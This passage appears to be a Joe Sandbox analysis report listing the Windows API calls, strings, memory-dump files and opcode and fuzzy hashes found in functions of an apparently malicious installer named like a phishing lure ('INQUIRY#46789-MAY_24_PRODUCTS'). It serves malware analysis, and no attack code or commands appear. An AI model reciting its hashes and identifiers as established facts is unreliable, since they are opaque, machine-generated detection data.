                              • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00435400), ref: 00403925
                                • Part of subcall function 00405EFE: wsprintfA.USER32 ref: 00405F0B
                              • RegisterClassA.USER32(0042EBA0), ref: 00403962
                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040397A
                              • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039AF
                              • ShowWindow.USER32(00000005,00000000), ref: 004039E5
                              • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBA0), ref: 00403A11
                              • GetClassInfoA.USER32(00000000,RichEdit,0042EBA0), ref: 00403A1E
                              • RegisterClassA.USER32(0042EBA0), ref: 00403A27
                              • DialogBoxParamA.USER32(?,00000000,00403B6B,00000000), ref: 00403A46
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                              • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                              • API String ID: 1975747703-2904746566
                              • Opcode ID: 6eb3a8c6d4b6a1eb21d80e3e72b0c71cc60e502e6c5045bb4d9ce0f5c3d8f447
                              • Instruction ID: 26e7699ed4e6b10e00d4509f8022fed07cb2a9a1b54ab9853cf40adcb97aba69
                              • Opcode Fuzzy Hash: 6eb3a8c6d4b6a1eb21d80e3e72b0c71cc60e502e6c5045bb4d9ce0f5c3d8f447
                              • Instruction Fuzzy Hash: 2B61C970340601BED620BB669D46F373EACEB54749F80447FF985B22E2CB7C59069A2D
                              APIs
                              • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404235
                              • GetDlgItem.USER32(00000000,000003E8), ref: 00404249
                              • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404267
                              • GetSysColor.USER32(?), ref: 00404278
                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404287
                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404296
                              • lstrlenA.KERNEL32(?), ref: 00404299
                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042A8
                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042BD
                              • GetDlgItem.USER32(?,0000040A), ref: 0040431F
                              • SendMessageA.USER32(00000000), ref: 00404322
                              • GetDlgItem.USER32(?,000003E8), ref: 0040434D
                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040438D
                              • LoadCursorA.USER32(00000000,00007F02), ref: 0040439C
                              • SetCursor.USER32(00000000), ref: 004043A5
                              • LoadCursorA.USER32(00000000,00007F00), ref: 004043BB
                              • SetCursor.USER32(00000000), ref: 004043BE
                              • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043EA
                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043FE
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                              • String ID: N$uA@
                              • API String ID: 3103080414-3275078707
                              • Opcode ID: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
                              • Instruction ID: fd9e69a661c90447e44b9af037de2c0158a1a23ec1d513a6b2b78bd76040a697
                              • Opcode Fuzzy Hash: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
                              • Instruction Fuzzy Hash: A26183B1A00205BFDB109F61DD45F6A7B69EB84705F10803AFB057A1D1C7B8A951CF58
                              APIs
                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                              • BeginPaint.USER32(?,?), ref: 00401047
                              • GetClientRect.USER32(?,?), ref: 0040105B
                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                              • DeleteObject.GDI32(?), ref: 004010ED
                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                              • SelectObject.GDI32(00000000,?), ref: 00401140
                              • DrawTextA.USER32(00000000,0042EC00,000000FF,00000010,00000820), ref: 00401156
                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                              • DeleteObject.GDI32(?), ref: 00401165
                              • EndPaint.USER32(?,?), ref: 0040116E
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                              • String ID: F
                              • API String ID: 941294808-1304234792
                              • Opcode ID: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                              • Instruction ID: bc05fa60d2536021e17fc8d2ced0f843766159cda975d832d6f25ccf31630e85
                              • Opcode Fuzzy Hash: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                              • Instruction Fuzzy Hash: C8419C71800209AFCF058F95DE459AFBBB9FF44310F00802EF9A1AA1A0C774D955DFA4
                              APIs
                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405DA0,?,?), ref: 00405C40
                              • GetShortPathNameA.KERNEL32(?,0042C600,00000400), ref: 00405C49
                                • Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
                                • Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0
                              • GetShortPathNameA.KERNEL32(?,0042CA00,00000400), ref: 00405C66
                              • wsprintfA.USER32 ref: 00405C84
                              • GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405CBF
                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405CCE
                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D06
                              • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D5C
                              • GlobalFree.KERNEL32(00000000), ref: 00405D6D
                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D74
                                • Part of subcall function 00405B39: GetFileAttributesA.KERNEL32(00000003,00402DA3,00436C00,80000000,00000003), ref: 00405B3D
                                • Part of subcall function 00405B39: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                              • String ID: %s=%s$[Rename]
                              • API String ID: 2171350718-1727408572
                              • Opcode ID: 2cfa5c40c2b605b7ef1c0ecf3cbe6f2e1654e9f538de3556496336cfe16ba9f3
                              • Instruction ID: 165561d39814ef1f1a34b1aa6794dd1f6cd1d2ce27369611909fe2f807e8c01f
                              • Opcode Fuzzy Hash: 2cfa5c40c2b605b7ef1c0ecf3cbe6f2e1654e9f538de3556496336cfe16ba9f3
                              • Instruction Fuzzy Hash: 5D310531200F19ABC2206B659D4DF6B3A5CDF45754F14443BFA01B62D2EA7CA8018EBD
                              APIs
                              • GetDlgItem.USER32(?,000003FB), ref: 00404520
                              • SetWindowTextA.USER32(00000000,?), ref: 0040454A
                              • SHBrowseForFolderA.SHELL32(?,00429C48,?), ref: 004045FB
                              • CoTaskMemFree.OLE32(00000000), ref: 00404606
                              • lstrcmpiA.KERNEL32(0042E3A0,0042A870), ref: 00404638
                              • lstrcatA.KERNEL32(?,0042E3A0), ref: 00404644
                              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404656
                                • Part of subcall function 004056A0: GetDlgItemTextA.USER32(?,?,00000400,0040468D), ref: 004056B3
                                • Part of subcall function 0040620A: CharNextA.USER32(?,*?|<>/":,00000000,00435000,76193410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406262
                                • Part of subcall function 0040620A: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
                                • Part of subcall function 0040620A: CharNextA.USER32(?,00435000,76193410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406274
                                • Part of subcall function 0040620A: CharPrevA.USER32(?,?,76193410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406284
                              • GetDiskFreeSpaceA.KERNEL32(00429840,?,?,0000040F,?,00429840,00429840,?,00000001,00429840,?,?,000003FB,?), ref: 00404714
                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040472F
                                • Part of subcall function 00404888: lstrlenA.KERNEL32(0042A870,0042A870,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
                                • Part of subcall function 00404888: wsprintfA.USER32 ref: 0040492E
                                • Part of subcall function 00404888: SetDlgItemTextA.USER32(?,0042A870), ref: 00404941
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                              • String ID: A
                              • API String ID: 2624150263-3554254475
                              • Opcode ID: cdde6bf5d860e80b1670e7dcdf7f51639cc8ffce7cf8acda1903fa5029e0e2f5
                              • Instruction ID: e7408234a4186d1eb777f56003ea07db5a22e6c17a70b9954916109459a63af9
                              • Opcode Fuzzy Hash: cdde6bf5d860e80b1670e7dcdf7f51639cc8ffce7cf8acda1903fa5029e0e2f5
                              • Instruction Fuzzy Hash: EEA170B1900219ABDB11EFA6CD41AAF77B8EF85314F50843BF601B62D1DB7C89418B6D
                              APIs
                              • GetTickCount.KERNEL32 ref: 00402D74
                              • GetModuleFileNameA.KERNEL32(00000000,00436C00,00000400), ref: 00402D90
                                • Part of subcall function 00405B39: GetFileAttributesA.KERNEL32(00000003,00402DA3,00436C00,80000000,00000003), ref: 00405B3D
                                • Part of subcall function 00405B39: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                              • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,00435C00,00435C00,00436C00,00436C00,80000000,00000003), ref: 00402DDC
                              Strings
                              • Null, xrefs: 00402E5A
                              • soft, xrefs: 00402E51
                              • Error launching installer, xrefs: 00402DB3
                              • Inst, xrefs: 00402E48
                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F3B
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                              • API String ID: 4283519449-1074636621
                              • Opcode ID: 0ada85f12cf01c90e965dc0c6425161c0b1bcf50f2fa52f3a00b6f97cbd218ea
                              • Instruction ID: 2bf3385630e85dd4df9d7bf2b803376e12afffe2b97a8d7f9aa5fd2bd7c684e6
                              • Opcode Fuzzy Hash: 0ada85f12cf01c90e965dc0c6425161c0b1bcf50f2fa52f3a00b6f97cbd218ea
                              • Instruction Fuzzy Hash: BD51F571900214ABDB219F65DE89B9F7AB8EB14368F50403BF904B72D0C7BC9D458BAD
                              APIs
                              • GetSystemDirectoryA.KERNEL32(0042E3A0,00000400), ref: 004060ED
                              • GetWindowsDirectoryA.KERNEL32(0042E3A0,00000400,?,0042A050,00000000,004050FF,0042A050,00000000), ref: 00406100
                              • SHGetSpecialFolderLocation.SHELL32(004050FF,761923A0,?,0042A050,00000000,004050FF,0042A050,00000000), ref: 0040613C
                              • SHGetPathFromIDListA.SHELL32(761923A0,0042E3A0), ref: 0040614A
                              • CoTaskMemFree.OLE32(761923A0), ref: 00406156
                              • lstrcatA.KERNEL32(0042E3A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617A
                              • lstrlenA.KERNEL32(0042E3A0,?,0042A050,00000000,004050FF,0042A050,00000000,00000000,?,761923A0), ref: 004061CC
                              Strings
                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 004060BC
                              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406174
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                              • API String ID: 717251189-730719616
                              • Opcode ID: 51f7f20917835abc90d04fd7ead949147b631891de6bb8cdcea0e0046e261de2
                              • Instruction ID: 67ab450255a0c50706d08a2588864b7c9a920b8361f3652e316ab2a1c483ee89
                              • Opcode Fuzzy Hash: 51f7f20917835abc90d04fd7ead949147b631891de6bb8cdcea0e0046e261de2
                              • Instruction Fuzzy Hash: C661E375900105AEDB209F24CD84BBF7BA4AB15314F52413FEA03BA2D2C67C8962CB5D
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: CountTick$wsprintf
                              • String ID: (TA$(TA$... %d%%
                              • API String ID: 551687249-2950751476
                              • Opcode ID: a0691e7d4b1972c1c6b665dba6ae3b2a2bfd9af5d6c8964951a9ca70517b3b3f
                              • Instruction ID: 5c281e24a88a3bae7ae2a550c5808c60fec2149314028a17d76778b6f2aa7d1b
                              • Opcode Fuzzy Hash: a0691e7d4b1972c1c6b665dba6ae3b2a2bfd9af5d6c8964951a9ca70517b3b3f
                              • Instruction Fuzzy Hash: BB518171900219DBDB00DF66DA4479E7BB8EF4875AF10453BE814BB2D0C7789E40CBA9
                              APIs
                              • GetWindowLongA.USER32(?,000000EB), ref: 004040C3
                              • GetSysColor.USER32(00000000), ref: 00404101
                              • SetTextColor.GDI32(?,00000000), ref: 0040410D
                              • SetBkMode.GDI32(?,?), ref: 00404119
                              • GetSysColor.USER32(?), ref: 0040412C
                              • SetBkColor.GDI32(?,?), ref: 0040413C
                              • DeleteObject.GDI32(?), ref: 00404156
                              • CreateBrushIndirect.GDI32(?), ref: 00404160
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                              • String ID:
                              • API String ID: 2320649405-0
                              • Opcode ID: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                              • Instruction ID: acf379a668eb7ba76ca74fd388386b38bd03efbb8d8a5887114ae3c25b447e5f
                              • Opcode Fuzzy Hash: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                              • Instruction Fuzzy Hash: 122174715007049BCB309F78DD4CB5BBBF8AF91710B048A3EEA96A66E0D734D984CB54
                              APIs
                              • lstrlenA.KERNEL32(0042A050,00000000,?,761923A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                              • lstrlenA.KERNEL32(004030F7,0042A050,00000000,?,761923A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                              • lstrcatA.KERNEL32(0042A050,004030F7,004030F7,0042A050,00000000,?,761923A0), ref: 00405123
                              • SetWindowTextA.USER32(0042A050,0042A050), ref: 00405135
                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                              • String ID:
                              • API String ID: 2531174081-0
                              • Opcode ID: 57bc30585033a45ff0503b142d8cfa380acccc19d4d3abea87a767d6a2fe19a3
                              • Instruction ID: 4d1d9eb5ffa78b07b8376cbf0c4e91ada4ce3c5a86d4cc872ddc87c593067670
                              • Opcode Fuzzy Hash: 57bc30585033a45ff0503b142d8cfa380acccc19d4d3abea87a767d6a2fe19a3
                              • Instruction Fuzzy Hash: 69214A71900518BADB119FA5CD84A9FBFA9EB09354F14807AF944AA291C7398E418F98
                              APIs
                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049AD
                              • GetMessagePos.USER32 ref: 004049B5
                              • ScreenToClient.USER32(?,?), ref: 004049CF
                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 004049E1
                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A07
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Message$Send$ClientScreen
                              • String ID: f
                              • API String ID: 41195575-1993550816
                              • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                              • Instruction ID: 01adb620d992fda54c9cccfda8f446508f93e77e16c9618e278126a6ed05cf06
                              • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                              • Instruction Fuzzy Hash: 14015E75900219BAEB00DBA4DD85BFFBBBCAF55711F10412BBA50F61C0C7B499418BA4
                              APIs
                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C97
                              • MulDiv.KERNEL32(?,00000064,?), ref: 00402CC2
                              • wsprintfA.USER32 ref: 00402CD2
                              • SetWindowTextA.USER32(?,?), ref: 00402CE2
                              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CF4
                              Strings
                              • verifying installer: %d%%, xrefs: 00402CCC
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Text$ItemTimerWindowwsprintf
                              • String ID: verifying installer: %d%%
                              • API String ID: 1451636040-82062127
                              • Opcode ID: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
                              • Instruction ID: 0a6faa1976aca28fcdfc9934e3507063152a2d7882a275f196f36718a2c25724
                              • Opcode Fuzzy Hash: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
                              • Instruction Fuzzy Hash: 8F014F7064020CFBEF249F61DD09EEE37A9AB04304F008039FA06B52D0DBB989558F58
                              APIs
                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
                              • wsprintfA.USER32 ref: 0040631A
                              • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 0040632E
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: DirectoryLibraryLoadSystemwsprintf
                              • String ID: %s%s.dll$UXTHEME$\
                              • API String ID: 2200240437-4240819195
                              • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                              • Instruction ID: 4b2e1b96e526c3afc1937c3159904a09e8452480974eeaf1dbd8ebd71d3b02b5
                              • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                              • Instruction Fuzzy Hash: 87F0F63050060AABEB14AB74DD0DFEB375CAB08305F14047AAA87E11C1EA78D9398B9C
                              APIs
                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
                              • GlobalFree.KERNEL32(?), ref: 004027EB
                              • GlobalFree.KERNEL32(00000000), ref: 004027FE
                              • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A
                              Memory Dump Source
                              • Source File: 00000005.00000002.178258020918.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.178257983215.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258055210.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258089747.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.178258123409.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                              • String ID:
                              • API String ID: 2667972263-0
                              • Opcode ID: d16b92c6e49c5f1eda150bd2065ff059c02a3c223b7b2492d8b40f99e43a7d67
                              • Instruction ID: a22fe22bcc3eabd59056b14894fa73c1d09c67f360634fc0aee3e8da3dcac443
